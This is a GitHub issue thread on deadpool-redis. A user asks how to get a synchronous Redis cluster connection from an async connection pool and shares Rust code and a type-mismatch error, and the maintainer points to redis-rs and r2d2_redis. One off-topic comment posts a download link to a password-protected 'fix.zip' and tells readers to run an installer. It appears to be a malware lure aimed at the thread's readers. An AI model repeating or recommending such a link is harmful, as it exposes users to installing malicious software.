### ISSUE TITLE
Redis: how to obtain sync connection from async_cluster pool?

### ISSUE THREAD

**Issue by heavycharged** [bikeshedder/deadpool#348]
Hi,

Currently, Redis has few limitations:
- pipe can be called with sync/async connections (pipe though can be used in cluster, but when all keys has the same hash tags `{...}`)
- cluster_pipe [can be called](https://github.com/redis-rs/redis-rs/issues/1255) only with sync connections

How to obtain sync connection from pool of async cluster connections?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bikeshedder** [comment]
`deadpool-redis` is just a connection pool. You should raise this issue in the [redis-rs](https://github.com/redis-rs/redis-rs) project.

Alternatively you can just use [r2d2_redis](https://crates.io/crates/r2d2_redis). If you need a sync redis connection anyways you should probably be using a sync connection pool, too?

**Comment by heavycharged** [comment]
Hi, I was previously able to work around this issue when I first opened it, but I’m no longer able to do so now.

Here’s the core of the problem:

The redis crate provides both [get_connection](https://docs.rs/redis/latest/redis/cluster/struct.ClusterClient.html#method.get_connection) (synchronous) and [get_async_connection](https://docs.rs/redis/latest/redis/cluster/struct.ClusterClient.html#method.get_async_connection) methods, which helps to workaround lack of async cluster pipe support.

This allows you to do something like the following — mostly using async code, but still fallback to sync connection to send pipe commands:

```rust
async fn write_batch(
    &self,
    data: &[Data],
) -> Result<(), Error> {
    let mut pipe = cluster_pipe();

    for row in data {
        Self::append_data(&mut pipe, row)?;
    }

    // here, query needs sync connection
    Ok(pipe.query(&mut self.redis.get_connection()?)?)
}
```

Now, when using deadpool-redis, is there any way to obtain a synchronous connection from the pool? I primarily work in an async context, but in this case, to workaround limitations, i need to obtain ClusterClient that is synchronous. 

There is the error i currently got:

```
error[E0308]: mismatched types
   --> src/data/repository.rs:157:23
    |
157 |         Ok(pipe.query(&mut *conn)?)
    |                 ----- ^^^^^^^^^^ expected `redis::cluster::ClusterConnection`, found `ClusterConnection`
    |                 |
    |                 arguments to this method are incorrect
    |
    = note: expected mutable reference `&mut redis::cluster::ClusterConnection`
               found mutable reference `&mut deadpool_redis::cluster::ClusterConnection`
```

Also, [here](https://github.com/redis-rs/redis-rs/issues/1255#issuecomment-2215436213) is a bit of more context.

Thanks!
